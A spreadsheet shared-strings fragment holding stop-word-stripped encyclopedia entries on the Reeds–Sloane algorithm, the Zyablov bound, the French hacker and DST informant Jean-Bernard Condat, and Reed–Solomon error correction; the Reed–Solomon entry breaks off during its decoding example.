    <t>Reeds–Sloane algorithm</t>
  </si>
  <si>
    <t>reeds–sloane algorithm, named james reeds neil sloane, extension berlekamp–massey algorithm, algorithm finding shortest linear-feedback shift register (lfsr) given output sequence, sequences take values integers references reeds, sloane (1985). "shift-register synthesis (modulo (pdf). siam journal computing. (3): 505–513. citeseerx 10.1.1.48.4652. doi:10.1137/0214038. external links reeds–sloane algorithm mathworld</t>
  </si>
  <si>
    <t>Zyablov bound</t>
  </si>
  <si>
    <t>coding theory, zyablov bound lower bound rate {\displaystyle relative distance {\displaystyle \delta achievable concatenated codes. statement bound bound states exists family {\displaystyle -ary (concatenated, linear) codes rate {\displaystyle relative distance {\displaystyle \delta whenever {\displaystyle r\leqslant \max \limits _{0\leqslant r'\leqslant 1-h_{q}(\delta )}r'\cdot \left(1-{\delta \over {h_{q}^{-1}(1-r')}}\right)} {\displaystyle h_{q}} {\displaystyle -ary entropy function {\displaystyle h_{q}(x)=x\log _{q}(q-1)-x\log _{q}(x)-(1-x)\log _{q}(1-x)} description bound obtained considering range parameters obtainable concatenating "good" outer code {\displaystyle c_{out}} "good" inner code {\displaystyle c_{in}} specifically, suppose outer code meets singleton bound, i.e. rate {\displaystyle r_{out}} relative distance {\displaystyle \delta _{out}} satisfying {\displaystyle r_{out}+\delta _{out}=1} reed solomon codes family codes tuned rate {\displaystyle r_{out}\in (0,1)} relative distance {\displaystyle 1-r_{out}} (albeit alphabet large codeword length). suppose inner code meets gilbert–varshamov bound, i.e. rate {\displaystyle r_{in}} relative distance {\displaystyle \delta _{in}} satisfying {\displaystyle r_{in}+h_{q}(\delta _{in})\geq random linear codes known satisfy property high probability, explicit linear code satisfying property found brute-force search (which requires time polynomial size message space). concatenation {\displaystyle c_{out}} {\displaystyle c_{in}} denoted {\displaystyle c_{out}\circ c_{in}} rate {\displaystyle r=r_{in}\cdot r_{out}} relative distance {\displaystyle \delta =\delta _{out}\cdot \delta _{in}\geq (1-r_{out})\cdot h_{q}^{-1}(1-r_{in}).} expressing {\displaystyle r_{out}} function {\displaystyle \delta ,r_{in}} {\displaystyle r_{out}\geq 1-{\frac {\delta }{h^{-1}(1-r_{in})}}} then optimizing choice {\displaystyle r_{in}} possible concatenated code satisfy, {\displaystyle r\geq \max \limits _{0\leq r_{in}\leq {1-h_{q}(\delta )}}r_{in}\cdot \left(1-{\delta \over {h_{q}^{-1}(1-r_{in})}}\right)} figure plot bound. note zyablov bound implies every {\displaystyle \delta exists (concatenated) code positive rate positive relative distance. remarks construct code achieves zyablov bound polynomial time. particular, construct explicit asymptotically good code (over alphabets) polynomial time. linear codes help complete proof statement since linear codes polynomial representation. cout {\displaystyle [n,k]_{q}} reed–solomon error correction code {\displaystyle n=q-1} (evaluation points {\displaystyle \mathbb _{q}^{*}} {\displaystyle q=q^{k}} {\displaystyle k=\theta (\log need construct inner code lies gilbert-varshamov bound. this done ways perform exhaustive search generator matrices required property satisfied {\displaystyle c_{in}} this varshamovs bound states exists linear code lies gilbert-varshamon bound take {\displaystyle q^{o(kn)}} time. using {\displaystyle k=rn} {\displaystyle q^{o(kn)}=q^{o(k^{2})}=n^{o(\log n)}} upper bounded {\displaystyle nn^{o(\log nn)}} quasi-polynomial time bound. construct {\displaystyle c_{in}} {\displaystyle q^{o(n)}} time {\displaystyle (nn)^{o(1)}} time overall. this achieved using method conditional expectation proof random linear code lies bound high probability.thus construct code achieves zyablov bound polynomial time. also singleton bound gilbert-varshamov bound references external links lecture notes essential coding theory madhu sudan university buffalo lecture notes coding theory atri rudra university washington lecture notes coding theory- venkatesan guruswami</t>
  </si>
  <si>
    <t>Jean-Bernard Condat</t>
  </si>
  <si>
    <t>jean-bernard condat (born 1963) french computer security expert former hacker became consultant directorate territorial surveillance (dst). using name concombre (english: cucumber), achieved status best-known french hackers 1990s. biography condat born 1963 béziers, hérault. completed baccalauréat attending university lyon study musicology, earning deug. chaos computer club france around 1982 condat joined directorate territorial surveillance, intelligence agency within french national police, planted strategic positions, sysop compuserve. 1989, instruction agent jean-luc delacour, created chaos computer club france, fake hacker group posing national offshoot chaos computer club, purpose investigating surveilling french hacker community. group would also work national gendarmarie. cccf electronic magazine called chaos digest (chaosd). between january 1993 august 1993, seventy-three issues published (issn 1244-4901). bibliography condat, jean-bernard, (1988). nombre d'or musique [golden section music]. peter lang gmbh. isbn 978-3631403471. also chaos computer club list hacker groups references</t>
  </si>
  <si>
    <t>Reed–Solomon error correction</t>
  </si>
  <si>
    <t>reed–solomon codes group error-correcting codes introduced irving reed gustave solomon 1960. they many applications, prominent include consumer technologies minidiscs, cds, dvds, blu-ray discs, codes, data transmission technologies wimax, broadcast systems satellite communications, atsc, storage systems raid reed–solomon codes operate block data treated finite-field elements called symbols. reed–solomon codes able detect correct multiple symbol errors. adding check symbols data, reed–solomon code detect (but correct) combination erroneous symbols, locate correct ⌊t/2⌋ erroneous symbols unknown locations. erasure code, correct erasures locations known provided algorithm, detect correct combinations errors erasures. reed–solomon codes also suitable multiple-burst bit-error correcting codes, since sequence consecutive errors affect symbols size choice designer code selected within wide limits. there basic types reed–solomon codes original view view view common, view decoders faster require less working storage original view decoders. history reed–solomon codes developed 1960 irving reed gustave solomon, staff members lincoln laboratory. their seminal article titled "polynomial codes certain finite fields". (reed solomon 1960). original encoding scheme described reed solomon article used variable polynomial based message encoded fixed values (evaluation points) encoded known encoder decoder. original theoretical decoder generated potential polynomials based subsets (unencoded message length) (encoded message length) values received message, choosing popular polynomial correct one, impractical simplest cases. this initially resolved changing original scheme code like scheme based fixed polynomial known encoder decoder, later, practical decoders based original scheme developed, although slower schemes. result main types reed solomon codes, ones original encoding scheme, ones encoding scheme. also 1960, practical fixed polynomial decoder codes developed daniel gorenstein neal zierler described lincoln laboratory report zierler january 1960 later paper june 1961. gorenstein–zierler decoder related work codes described book error correcting codes wesley peterson (1961). 1963 possibly earlier), stone (and others) recognized reed solomon codes could scheme using fixed generator polynomial, making codes special class codes, reed solomon codes based original encoding scheme, class codes, depending evaluation points, even cyclic codes. 1969, improved scheme decoder developed elwyn berlekamp james massey, since known berlekamp–massey decoding algorithm. 1975, another improved scheme decoder developed yasuo sugiyama, based extended euclidean algorithm. 1977, reed–solomon codes implemented voyager program form concatenated error correction codes. first commercial application mass-produced consumer products appeared 1982 compact disc, interleaved reed–solomon codes used. today, reed–solomon codes widely implemented digital storage devices digital communication standards, though slowly replaced bose–chaudhuri–hocquenghem (bch) codes. example, reed–solomon codes used digital video broadcasting (dvb) standard dvb-s, conjunction convolutional inner code, codes used ldpc successor, dvb-s2. 1986, original scheme decoder known berlekamp–welch algorithm developed. 1996, variations original scheme decoders called list decoders soft decoders developed madhu sudan others, work continues types decoders guruswami–sudan list decoding algorithm. 2002, another original scheme decoder developed shuhong gao, based extended euclidean algorithm. applications data storage reed–solomon coding widely used mass storage systems correct burst errors associated media defects. reed–solomon coding component compact disc. first strong error correction coding mass-produced consumer product, similar schemes. layers reed–solomon coding separated 28-way convolutional interleaver yields scheme called cross-interleaved reed–solomon coding (circ). first element circ decoder relatively weak inner (32,28) reed–solomon code, shortened (255,251) code 8-bit symbols. this code correct byte errors 32-byte block. more importantly, flags erasures uncorrectable blocks, i.e., blocks byte errors. decoded 28-byte blocks, erasure indications, spread deinterleaver different blocks (28,24) outer code. thanks deinterleaving, erased 28-byte block inner code becomes single erased byte outer code blocks. outer code easily corrects this, since handle erasures block. result circ completely correct error bursts 4000 bits, disc surface. this code strong playback errors almost certainly caused tracking errors cause laser jump track, uncorrectable error bursts.dvds similar scheme, much larger blocks, (208,192) inner code, (182,172) outer code. reed–solomon error correction also used parchive files commonly posted accompanying multimedia files usenet. distributed online storage service wuala (discontinued 2015) also used reed–solomon breaking files. code almost two-dimensional codes pdf-417, maxicode, datamatrix, code, aztec code reed–solomon error correction allow correct reading even portion code damaged. when code scanner cannot recognize code symbol, treat erasure. reed–solomon coding less common one-dimensional codes, used postbar symbology. data transmission specialized forms reed–solomon codes, specifically cauchy-rs vandermonde-rs, used overcome unreliable nature data transmission erasure channels. encoding process assumes code rs(n, results codewords length symbols storing symbols data, generated, sent erasure channel. combination codewords received enough reconstruct codewords. code rate generally unless channel's erasure likelihood adequately modelled seen less. conclusion, usually meaning least half codewords sent must received order reconstruct codewords sent. reed–solomon codes also used xdsl systems ccsds's space communications protocol specifications form forward error correction. space transmission significant application reed–solomon coding encode digital pictures sent back voyager program. voyager introduced reed–solomon coding concatenated convolutional codes, practice since become widespread deep space satellite (e.g., direct digital broadcasting) communications. viterbi decoders tend produce errors short bursts. correcting burst errors best done short simplified reed–solomon codes. modern versions concatenated reed–solomon/viterbi-decoded convolutional coding used mars pathfinder, galileo, mars exploration rover cassini missions, perform within 1–1.5 ultimate limit, shannon capacity. these concatenated codes replaced powerful turbo codes: constructions (encoding) reed–solomon code actually family codes, every code characterised three parameters: alphabet size block length message length alphabet symbols interpreted finite field order thus, must prime power. useful parameterizations reed–solomon code, block length usually constant multiple message length, rate constant, furthermore, block length equal less alphabet size, reed solomon's original view: codeword sequence values there different encoding procedures reed–solomon code, thus, different ways describe codewords. original view reed solomon (1960), every codeword reed–solomon code sequence function values polynomial degree less order obtain codeword reed–solomon code, message symbols (each within q-sized alphabet) treated coefficients polynomial degree less finite field elements. turn, polynomial evaluated distinct points {\displaystyle a_{1},\dots ,a_{n}} field sequence values corresponding codeword. common choices evaluation points include ..., ..., αn−2}, ..., αn−1}, primitive element formally, {\displaystyle \mathbf codewords reed–solomon code defined follows: polynomial degree {\displaystyle \mathbf ={\big \{}\;{\big (}p(a_{1}),p(a_{2}),\dots ,p(a_{n}){\big )}\;{\big |}\;p{\text{ polynomial }}f{\text{ degree }}&lt;k\;{\big \}}\,.} since distinct polynomials degree less {\displaystyle agree {\displaystyle k-1} points, means codewords reed–solomon code disagree least {\displaystyle n-(k-1)=n-k+1} positions. furthermore, polynomials agree {\displaystyle k-1} points equal, thus, distance reed–solomon code exactly {\displaystyle d=n-k+1} then relative distance {\displaystyle \delta =d/n=1-k/n+1/n=1-r+1/n\sim 1-r} {\displaystyle r=k/n} rate. this trade-off relative distance rate asymptotically optimal since, singleton bound, every code satisfies {\displaystyle \delta +r\leq 1+1/n} being code achieves optimal trade-off, reed–solomon code belongs class maximum distance separable codes. while number different polynomials degree less number different messages equal {\displaystyle q^{k}} thus every message uniquely mapped polynomial, different ways encoding. original construction reed solomon (1960) interprets message coefficients polynomial whereas subsequent constructions interpret message values polynomial first points {\displaystyle a_{1},\dots ,a_{k}} obtain polynomial interpolating values polynomial degree less latter encoding procedure, slightly less efficient, advantage gives rise systematic code, original message always contained subsequence codeword. simple encoding procedure: message sequence coefficients original construction reed solomon (1960), message {\displaystyle x=(x_{1},\dots ,x_{k})\in f^{k}} mapped polynomial {\displaystyle p_{x}} {\displaystyle p_{x}(a)=\sum _{i=1}^{k}x_{i}a^{i-1}\,.} codeword {\displaystyle obtained evaluating {\displaystyle p_{x}} {\displaystyle different points {\displaystyle a_{1},\dots ,a_{n}} field {\displaystyle thus classical encoding function {\displaystyle c:f^{k}\to f^{n}} reed–solomon code defined follows: {\displaystyle c(x)={\big (}p_{x}(a_{1}),\dots ,p_{x}(a_{n}){\big )}\,.} this function {\displaystyle linear mapping, satisfies {\displaystyle c(x)=x^{t}\cdot following {\displaystyle (k\times -matrix {\displaystyle elements {\displaystyle {\displaystyle a={\begin{bmatrix}1&amp;\dots &amp;1&amp;\dots &amp;1\\a_{1}&amp;\dots &amp;a_{k}&amp;\dots &amp;a_{n}\\a_{1}^{2}&amp;\dots &amp;a_{k}^{2}&amp;\dots &amp;a_{n}^{2}\\\vdots &amp;&amp;\vdots &amp;&amp;\vdots \\a_{1}^{k-1}&amp;\dots &amp;a_{k}^{k-1}&amp;\dots &amp;a_{n}^{k-1}\end{bmatrix}}} this matrix transpose vandermonde matrix {\displaystyle words, reed–solomon code linear code, classical encoding procedure, generator matrix {\displaystyle systematic encoding procedure: message initial sequence values there alternative encoding procedure also produces reed–solomon code, systematic way. here, mapping message {\displaystyle polynomial {\displaystyle p_{x}} works differently: polynomial {\displaystyle p_{x}} defined unique polynomial degree less {\displaystyle {\displaystyle p_{x}(a_{i})=x_{i}} holds {\displaystyle i\in \{1,\dots ,k\}} compute polynomial {\displaystyle p_{x}} {\displaystyle lagrange interpolation. once found, evaluated points {\displaystyle a_{k+1},\dots ,a_{n}} field. alternative encoding function {\displaystyle c:f^{k}\to f^{n}} reed–solomon code sequence values: {\displaystyle c(x)={\big (}p_{x}(a_{1}),\dots ,p_{x}(a_{n}){\big )}\,.} since first {\displaystyle entries codeword {\displaystyle c(x)} coincide {\displaystyle encoding procedure indeed systematic. since lagrange interpolation linear transformation, {\displaystyle linear mapping. fact, {\displaystyle c(x)=x\cdot left square submatrix {\displaystyle g=(a{\text{'s left square submatrix}})^{-1}\cdot a={\begin{bmatrix}1&amp;0&amp;0&amp;\dots &amp;0&amp;g_{1,k+1}&amp;\dots &amp;g_{1,n}\\0&amp;1&amp;0&amp;\dots &amp;0&amp;g_{2,k+1}&amp;\dots &amp;g_{2,n}\\0&amp;0&amp;1&amp;\dots &amp;0&amp;g_{3,k+1}&amp;\dots &amp;g_{3,n}\\\vdots &amp;\vdots &amp;\vdots &amp;&amp;\vdots &amp;\vdots &amp;&amp;\vdots \\0&amp;\dots &amp;0&amp;\dots &amp;1&amp;g_{k,k+1}&amp;\dots &amp;g_{k,n}\end{bmatrix}}} discrete fourier transform inverse discrete fourier transform essentially encoding procedure; uses generator polynomial p(x) evaluation points message values shown above: {\displaystyle c(x)={\big (}p_{x}(a_{1}),\dots ,p_{x}(a_{n}){\big )}\,.} inverse fourier transform could used convert error free message values back encoding polynomial coefficients, constraint order work, evaluation points used encode message must increasing powers {\displaystyle a_{i}=\alpha ^{i-1}} {\displaystyle a_{1},\dots ,a_{n}=\{1,\alpha ,\alpha ^{2},\dots ,\alpha ^{n-1}\}} however, lagrange interpolation performs conversion without constraint evaluation points requirement error free message values used systematic encoding, steps decoder. view: codeword sequence coefficients view, message interpreted coefficients polynomial {\displaystyle p(x)} sender computes related polynomial {\displaystyle s(x)} degree {\displaystyle n-1} {\displaystyle n\leq q-1} sends polynomial {\displaystyle s(x)} polynomial {\displaystyle s(x)} constructed multiplying message polynomial {\displaystyle p(x)} degree {\displaystyle k-1} generator polynomial {\displaystyle g(x)} degree {\displaystyle n-k} known sender receiver. generator polynomial {\displaystyle g(x)} defined polynomial whose roots sequential powers galois field primitive {\displaystyle \alpha {\displaystyle g(x)=(x-\alpha ^{i})(x-\alpha ^{i+1})\cdots (x-\alpha ^{i+n-k-1})=g_{0}+g_{1}x+\cdots +g_{n-k-1}x^{n-k-1}+x^{n-k}} "narrow sense code", {\displaystyle i=1} polynomial least roots {\displaystyle \mathbf =\left\{\left(s_{1},s_{2},\dots ,s_{n}\right)\;{\big |}\;s(a)=\sum _{i=1}^{n}s_{i}a^{i}{\text{ polynomial least roots }}\alpha ^{1},\alpha ^{2},\dots ,\alpha ^{n-k}\right\}\,.} systematic encoding procedure encoding procedure view reed–solomon codes modified yield systematic encoding procedure, codeword contains message prefix, simply appends error correcting symbols suffix. here, instead sending {\displaystyle s(x)=p(x)g(x)} encoder constructs transmitted polynomial {\displaystyle s(x)} coefficients {\displaystyle largest monomials equal corresponding coefficients {\displaystyle p(x)} lower-order coefficients {\displaystyle s(x)} chosen exactly {\displaystyle s(x)} becomes divisible {\displaystyle g(x)} then coefficients {\displaystyle p(x)} subsequence coefficients {\displaystyle s(x)} code overall systematic, construct message polynomial {\displaystyle p(x)} interpreting message sequence coefficients. formally, construction done multiplying {\displaystyle p(x)} {\displaystyle x^{t}} make room {\displaystyle t=n-k} check symbols, dividing product {\displaystyle g(x)} find remainder, compensating remainder subtracting {\displaystyle check symbols created computing remainder {\displaystyle s_{r}(x)} {\displaystyle s_{r}(x)=p(x)\cdot x^{t}\ {\bmod }}g(x).} remainder degree {\displaystyle t-1} whereas coefficients {\displaystyle x^{t-1},x^{t-2},\dots ,x^{1},x^{0}} polynomial {\displaystyle p(x)\cdot x^{t}} zero. therefore, following definition codeword {\displaystyle s(x)} property first {\displaystyle coefficients identical coefficients {\displaystyle p(x)} {\displaystyle s(x)=p(x)\cdot x^{t}-s_{r}(x)\,.} result, codewords {\displaystyle s(x)} indeed elements {\displaystyle \mathbf divisible generator polynomial {\displaystyle g(x)} {\displaystyle s(x)\equiv p(x)\cdot x^{t}-s_{r}(x)\equiv s_{r}(x)-s_{r}(x)\equiv 0\mod g(x)\,.} properties reed–solomon code code; words, linear block code length (over dimension minimum hamming distance {\textstyle d_{\min }=n-k+1.} reed–solomon code optimal sense minimum distance maximum value possible linear code size known singleton bound. such code also called maximum distance separable (mds) code. error-correcting ability reed–solomon code determined minimum distance, equivalently, {\displaystyle n-k} measure redundancy block. locations error symbols known advance, reed–solomon code correct {\displaystyle (n-k)/2} erroneous symbols, i.e., correct half many errors redundant symbols added block. sometimes error locations known advance (e.g., "side information" demodulator signal-to-noise ratios)—these called erasures. reed–solomon code (like code) able correct twice many erasures errors, combination errors erasures corrected long relation satisfied, {\displaystyle number errors {\displaystyle number erasures block. theoretical error bound described following formula awgn channel fsk: {\displaystyle p_{b}\approx {\frac {2^{m-1}}{2^{m}-1}}{\frac {1}{n}}\sum _{\ell =t+1}^{n}\ell \choose \ell }p_{s}^{\ell }(1-p_{s})^{n-\ell modulation schemes: {\displaystyle p_{b}\approx {\frac {1}{m}}{\frac {1}{n}}\sum _{\ell =t+1}^{n}\ell \choose \ell }p_{s}^{\ell }(1-p_{s})^{n-\ell {\displaystyle t={\frac {1}{2}}(d_{\min }-1)} {\displaystyle p_{s}=1-(1-s)^{h}} {\displaystyle h={\frac {m}{\log _{2}m}}} {\displaystyle symbol error rate uncoded awgn case {\displaystyle modulation order. practical uses reed–solomon codes, common finite field {\displaystyle {\displaystyle 2^{m}} elements. case, symbol represented {\displaystyle -bit value. sender sends data points encoded blocks, number symbols encoded block {\displaystyle n=2^{m}-1} thus reed–solomon code operating 8-bit symbols {\displaystyle n=2^{8}-1=255} symbols block. (this popular value prevalence byte-oriented computer systems.) number {\displaystyle {\displaystyle k&lt;n} data symbols block design parameter. commonly used code encodes {\displaystyle k=223} eight-bit data symbols plus eight-bit parity symbols {\displaystyle n=255} -symbol block; denoted {\displaystyle (n,k)=(255,223)} code, capable correcting symbol errors block. reed–solomon code properties discussed make especially well-suited applications errors occur bursts. this matter code many bits symbol error multiple bits symbol corrupted counts single error. conversely, data stream characterized error bursts drop-outs random single errors, reed–solomon code usually poor choice compared binary code. reed–solomon code, like convolutional code, transparent code. this means channel symbols inverted somewhere along line, decoders still operate. result inversion original data. however, reed–solomon code loses transparency code shortened. "missing" bits shortened code need filled either zeros ones, depending whether data complemented not. another way, symbols inverted, zero-fill needs inverted one-fill.) reason mandatory sense data (i.e., true complemented) resolved reed–solomon decoding. whether reed–solomon code cyclic depends subtle details construction. original view reed solomon, codewords values polynomial, choose sequence evaluation points make code cyclic. particular, {\displaystyle \alpha primitive root field {\displaystyle definition non-zero elements {\displaystyle take form {\displaystyle \alpha ^{i}} {\displaystyle i\in \{1,\dots ,q-1\}} {\displaystyle q=|f|} each polynomial {\displaystyle {\displaystyle gives rise codeword {\displaystyle (p(\alpha ^{1}),\dots ,p(\alpha ^{q-1}))} since function {\displaystyle a\mapsto p(\alpha also polynomial degree, function gives rise codeword {\displaystyle (p(\alpha ^{2}),\dots ,p(\alpha ^{q}))} since {\displaystyle \alpha ^{q}=\alpha ^{1}} holds, codeword cyclic left-shift original codeword derived {\displaystyle choosing sequence primitive root powers evaluation points makes original view reed–solomon code cyclic. reed–solomon codes view always cyclic codes cyclic. remarks designers required "natural" sizes reed–solomon code blocks. technique known "shortening" produce smaller code desired size larger code. example, widely used (255,223) code converted (160,128) code padding unused portion source block binary zeroes transmitting them. decoder, portion block loaded locally binary zeroes. delsarte–goethals–seidel theorem illustrates example application shortened reed–solomon codes. parallel shortening, technique known puncturing allows omitting encoded parity symbols. view decoders decoders described section view codeword sequence coefficients. they fixed generator polynomial known encoder decoder. peterson–gorenstein–zierler decoder daniel gorenstein neal zierler developed decoder described lincoln laboratory report zierler january 1960 later paper june 1961. gorenstein–zierler decoder related work codes described book error correcting codes wesley peterson (1961). formulation transmitted message, {\displaystyle (c_{0},\ldots ,c_{i},\ldots ,c_{n-1})} viewed coefficients polynomial s(x): {\displaystyle s(x)=\sum _{i=0}^{n-1}c_{i}x^{i}} result reed-solomon encoding procedure, s(x) divisible generator polynomial g(x): {\displaystyle g(x)=\prod _{j=1}^{n-k}(x-\alpha ^{j}),} primitive element. since s(x) multiple generator g(x), follows "inherits" roots. {\displaystyle s(x)\ mod\ (x-\alpha ^{j})=g(x)\ mod\ (x-\alpha ^{j})=0} therefore, {\displaystyle s(\alpha ^{j})=0,\ j=1,2,\ldots ,n-k} transmitted polynomial corrupted transit error polynomial e(x) produce received polynomial r(x). {\displaystyle r(x)=s(x)+e(x)} {\displaystyle e(x)=\sum _{i=0}^{n-1}e_{i}x^{i}} coefficient zero error power nonzero error. errors distinct powers {\displaystyle e(x)=\sum _{k=1}^{\nu }e_{i_{k}}x^{i_{k}}} goal decoder find number errors (ν), positions errors (ik), error values positions (eik). from those, e(x) calculated subtracted r(x) originally sent message s(x). syndrome decoding decoder starts evaluating polynomial received points {\displaystyle \alpha ^{1}\dots \alpha ^{n-k}} call results evaluation "syndromes", they defined {\displaystyle {\begin{aligned}s_{j}&amp;=r(\alpha ^{j})=s(\alpha ^{j})+e(\alpha ^{j})=0+e(\alpha ^{j})=e(\alpha ^{j}),\ j=1,2,\ldots ,n-k\\&amp;=\sum _{k=1}^{\nu }e_{i_{k}}\left(\alpha ^{j}\right)^{i_{k}}\end{aligned}}} note {\displaystyle s(\alpha ^{j})=0} {\displaystyle s(x)} roots {\displaystyle \alpha ^{j}} shown previous section. advantage looking syndromes message polynomial drops out. words, syndromes relate error, unaffected actual contents message transmitted. syndromes zero, algorithm stops reports message corrupted transit. error locators error values convenience, define error locators error values {\displaystyle x_{k}=\alpha ^{i_{k}},\ y_{k}=e_{i_{k}}} then syndromes written terms error locators error values {\displaystyle s_{j}=\sum _{k=1}^{\nu }y_{k}x_{k}^{j}} this definition syndrome values equivalent previous since {\displaystyle (\alpha ^{j})^{i_{k}}=\alpha ^{j*i_{k}}=(\alpha ^{i_{k}})^{j}=x_{k}^{j}} syndromes give system equations unknowns, system equations nonlinear obvious solution. however, known (see below), syndrome equations provide linear system equations easily solved error values. {\displaystyle {\begin{bmatrix}x_{1}^{1}&amp;x_{2}^{1}&amp;\cdots &amp;x_{\nu }^{1}\\x_{1}^{2}&amp;x_{2}^{2}&amp;\cdots &amp;x_{\nu }^{2}\\\vdots &amp;\vdots &amp;&amp;\vdots \\x_{1}^{n-k}&amp;x_{2}^{n-k}&amp;\cdots &amp;x_{\nu }^{n-k}\\\end{bmatrix}}{\begin{bmatrix}y_{1}\\y_{2}\\\vdots \\y_{\nu }\end{bmatrix}}={\begin{bmatrix}s_{1}\\s_{2}\\\vdots \\s_{n-k}\end{bmatrix}}} consequently, problem finding leftmost matrix would known, sides equation could multiplied inverse, yielding variant algorithm locations errors already known (when used erasure code), end. error locations (xk) already known method (for example, transmission, sections bitstream unclear overcome interference probabilistically determinable frequency analysis). scenario, {\displaystyle n-k} errors corrected. rest algorithm serves locate errors, require syndrome values {\displaystyle instead {\displaystyle used thus far. this many error correcting symbols need added corrected without knowing locations. error locator polynomial there linear recurrence relation gives rise system linear equations. solving equations identifies error locations define error locator polynomial λ(x) {\displaystyle \lambda (x)=\prod _{k=1}^{\nu }(1-xx_{k})=1+\lambda _{1}x^{1}+\lambda _{2}x^{2}+\cdots +\lambda _{\nu }x^{\nu zeros λ(x) reciprocals {\displaystyle x_{k}^{-1}} this follows product notation construction since {\displaystyle x=x_{k}^{-1}} multiplied terms zero {\displaystyle (1-x_{k}^{-1}\cdot x_{k})=1-1=0} making whole polynomial evaluate zero. {\displaystyle \lambda (x_{k}^{-1})=0} {\displaystyle integer {\displaystyle 1\leq j\leq multiply sides {\displaystyle y_{k}x_{k}^{j+\nu still zero. {\displaystyle {\begin{aligned}&amp;y_{k}x_{k}^{j+\nu }\lambda (x_{k}^{-1})=0.\\&amp;y_{k}x_{k}^{j+\nu }(1+\lambda _{1}x_{k}^{-1}+\lambda _{2}x_{k}^{-2}+\cdots +\lambda _{\nu }x_{k}^{-\nu })=0.\\&amp;y_{k}x_{k}^{j+\nu }+\lambda _{1}y_{k}x_{k}^{j+\nu }x_{k}^{-1}+\lambda _{2}y_{k}x_{k}^{j+\nu }x_{k}^{-2}+\cdots +\lambda _{\nu }y_{k}x_{k}^{j+\nu }x_{k}^{-\nu }=0.\\&amp;y_{k}x_{k}^{j+\nu }+\lambda _{1}y_{k}x_{k}^{j+\nu -1}+\lambda _{2}y_{k}x_{k}^{j+\nu -2}+\cdots +\lambda _{\nu }y_{k}x_{k}^{j}=0.\\\end{aligned}}} still zero. {\displaystyle {\begin{aligned}&amp;\sum _{k=1}^{\nu }\left(y_{k}x_{k}^{j+\nu }+\lambda _{1}y_{k}x_{k}^{j+\nu -1}+\lambda _{2}y_{k}x_{k}^{j+\nu -2}+\cdots +\lambda _{\nu }y_{k}x_{k}^{j}\right)=0\\\end{aligned}}} collect term sum. {\displaystyle {\begin{aligned}&amp;\left(\sum _{k=1}^{\nu }y_{k}x_{k}^{j+\nu }\right)+\left(\sum _{k=1}^{\nu }\lambda _{1}y_{k}x_{k}^{j+\nu -1}\right)+\left(\sum _{k=1}^{\nu }\lambda _{2}y_{k}x_{k}^{j+\nu -2}\right)+\cdots +\left(\sum _{k=1}^{\nu }\lambda _{\nu }y_{k}x_{k}^{j}\right)=0\end{aligned}}} extract constant values {\displaystyle \lambda unaffected summation. {\displaystyle {\begin{aligned}&amp;\left(\sum _{k=1}^{\nu }y_{k}x_{k}^{j+\nu }\right)+\lambda _{1}\left(\sum _{k=1}^{\nu }y_{k}x_{k}^{j+\nu -1}\right)+\lambda _{2}\left(\sum _{k=1}^{\nu }y_{k}x_{k}^{j+\nu -2}\right)+\cdots +\lambda _{\nu }\left(\sum _{k=1}^{\nu }y_{k}x_{k}^{j}\right)=0\end{aligned}}} these summations equivalent syndrome values, know substitute this therefore reduces {\displaystyle s_{j+\nu }+\lambda _{1}s_{j+\nu -1}+\cdots +\lambda _{\nu -1}s_{j+1}+\lambda _{\nu }s_{j}=0\,} subtracting {\displaystyle s_{j+\nu sides yields {\displaystyle s_{j}\lambda _{\nu }+s_{j+1}\lambda _{\nu -1}+\cdots +s_{j+\nu -1}\lambda _{1}=-s_{j+\nu recall chosen integer inclusive, equivalence true values. therefore, linear equations, one. this system linear equations therefore solved coefficients error location polynomial: {\displaystyle {\begin{bmatrix}s_{1}&amp;s_{2}&amp;\cdots &amp;s_{\nu }\\s_{2}&amp;s_{3}&amp;\cdots &amp;s_{\nu +1}\\\vdots &amp;\vdots &amp;&amp;\vdots \\s_{\nu }&amp;s_{\nu +1}&amp;\cdots &amp;s_{2\nu -1}\end{bmatrix}}{\begin{bmatrix}\lambda _{\nu }\\\lambda _{\nu -1}\\\vdots \\\lambda _{1}\end{bmatrix}}={\begin{bmatrix}-s_{\nu +1}\\-s_{\nu +2}\\\vdots \\-s_{\nu +\nu }\end{bmatrix}}} assumes decoder knows number errors number determined yet. decoder determine directly rather searches trying successive values. decoder first assumes largest value trial sets linear system value. equations solved (i.e., matrix determinant nonzero), trial value number errors. linear system cannot solved, trial reduced next smaller system examined. (gill n.d., find roots error locator polynomial coefficients found last step build error location polynomial. roots error location polynomial found exhaustive search. error locators reciprocals roots. order coefficients error location polynomial reversed, case roots reversed polynomial error locators {\displaystyle x_{k}} (not reciprocals {\displaystyle x_{k}^{-1}} chien search efficient implementation step. calculate error values once error locators known, error values determined. this done direct solution error equations matrix given above, using forney algorithm. calculate error locations calculate taking base {\displaystyle \alpha this generally done using precomputed lookup table. errors finally, e(x) generated subtracted r(x) originally sent message s(x), errors corrected. example consider reed–solomon code defined gf(929) (this used pdf417 barcodes) rs(7,3) code. generator polynomial {\displaystyle g(x)=(x-3)(x-3^{2})(x-3^{3})(x-3^{4})=x^{4}+809x^{3}+723x^{2}+568x+522} message polynomial p(x) systematic codeword encoded follows. {\displaystyle s_{r}(x)=p(x)\,x^{t}\mod g(x)=547x^{3}+738x^{2}+442x+455} {\displaystyle s(x)=p(x)\,x^{t}-s_{r}(x)=3x^{6}+2x^{5}+1x^{4}+382x^{3}+191x^{2}+487x+474} errors transmission might cause received instead. {\displaystyle r(x)=s(x)+e(x)=3x^{6}+2x^{5}+123x^{4}+456x^{3}+191x^{2}+487x+474} syndromes calculated evaluating powers {\displaystyle s_{1}=r(3^{1})=3\cdot 3^{6}+2\cdot 3^{5}+123\cdot 3^{4}+456\cdot 3^{3}+191\cdot 3^{2}+487\cdot 3+474=732} {\displaystyle s_{2}=r(3^{2})=637,\;s_{3}=r(3^{3})=762,\;s_{4}=r(3^{4})=925} {\displaystyle {\begin{bmatrix}732&amp;637\\637&amp;762\end{bmatrix}}{\begin{bmatrix}\lambda _{2}\\\lambda _{1}\end{bmatrix}}={\begin{bmatrix}-762\\-925\end{bmatrix}}={\begin{bmatrix}167\\004\end{bmatrix}}} using gaussian elimination: {\displaystyle {\begin{bmatrix}001&amp;000\\000&amp;001\end{bmatrix}}{\begin{bmatrix}\lambda _{2}\\\lambda _{1}\end{bmatrix}}={\begin{bmatrix}329\\821\end{bmatrix}}} λ(x) 001, roots 3−4the coefficients reversed produce roots positive exponents, typically used: r(x) 329, roots 34with roots corresponding error locations (right left, location last term codeword). calculate error values, apply forney algorithm. ω(x) s(x) λ(x) λ'(x) 